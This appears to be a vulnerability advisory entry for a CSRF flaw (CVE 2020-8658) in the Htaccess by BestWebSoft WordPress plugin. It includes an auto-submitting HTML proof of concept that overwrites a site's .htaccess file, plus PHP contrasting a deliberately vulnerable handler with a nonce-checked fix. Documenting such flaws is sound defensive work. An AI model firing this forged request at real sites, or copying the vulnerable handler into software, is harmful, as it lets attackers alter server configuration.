Htaccess by BestWebSoft < 1.8.2 - CSRF to edit .htaccess
Proof of Concept
<html>
    <body onload="document.forms[0].submit();">
        <form action="https://[WP]/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" method="POST">
            <input type="hidden" name="htccss_customise" value="# Modified by CSRF" />
            <input type="hidden" name="htccss_form_custom" value="submit" />
            <input type="hidden" name="htccss_submit_button_custom" value="Save+Changes" />
            <input type="hidden" name="htccss_nonce_name" value="attacker" />
            <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" />
        </form>
    </body>
</html>
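As an added illustration (not the plugin's own code), the handler pattern that lets the PoC above succeed beside the hardened one: the mitigation for this class of bug is to verify a nonce bound to the logged-in user and check capability before any submitted content reaches the .htaccess file. The htccss_handle_editor_* functions, the action string and the path helper are assumptions; the field names come from the PoC and the WordPress API calls are core functions.

```php
<?php
// Added example, not the plugin's code. Field names follow the PoC above;
// the function names, the nonce action string and the path helper are hypothetical.

// Vulnerable pattern: the POST is trusted as long as a field named like a nonce
// is present, so a cross-site form carrying any value (e.g. "attacker") passes.
function htccss_handle_editor_vulnerable() {
    if ( isset( $_POST['htccss_form_custom'], $_POST['htccss_nonce_name'] ) ) {
        file_put_contents( htccss_file_path(), wp_unslash( $_POST['htccss_customise'] ) );
    }
}

// Hardened pattern: capability check, then nonce verification tied to the current
// user and session. check_admin_referer() validates $_POST['htccss_nonce_name']
// against the action string and terminates the request on failure; a page on
// another origin cannot obtain the victim's nonce, so the forged submit is rejected.
function htccss_handle_editor_hardened() {
    if ( ! isset( $_POST['htccss_form_custom'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    check_admin_referer( 'htccss_editor_action', 'htccss_nonce_name' ); // action name assumed
    $content = wp_unslash( $_POST['htccss_customise'] );
    file_put_contents( htccss_file_path(), $content );
}

// The editor form must emit a matching nonce so legitimate admin submissions pass.
function htccss_render_nonce_field() {
    wp_nonce_field( 'htccss_editor_action', 'htccss_nonce_name' );
}

// Hypothetical helper for the target file location.
function htccss_file_path() {
    return ABSPATH . '.htaccess';
}
```

From the defender's side, a write to .htaccess from an admin POST whose nonce does not verify is the event worth logging, since the referer field in the PoC is spoofable and cannot be relied on.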

Affects Plugin

fixed in version 1.8.2

References

CVE 2020-8658
URL https://github.com/V1n1v131r4/Exploiting-WP-Htaccess-by-BestWebSoft-Plugin/blob/master/README.md

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher V1n1v131r4
Views 3683
Verified Yes
WPVDB ID 10060

Timeline

Publicly Published 2020-02-01
Added 2020-02-06
Last Updated 2020-03-13
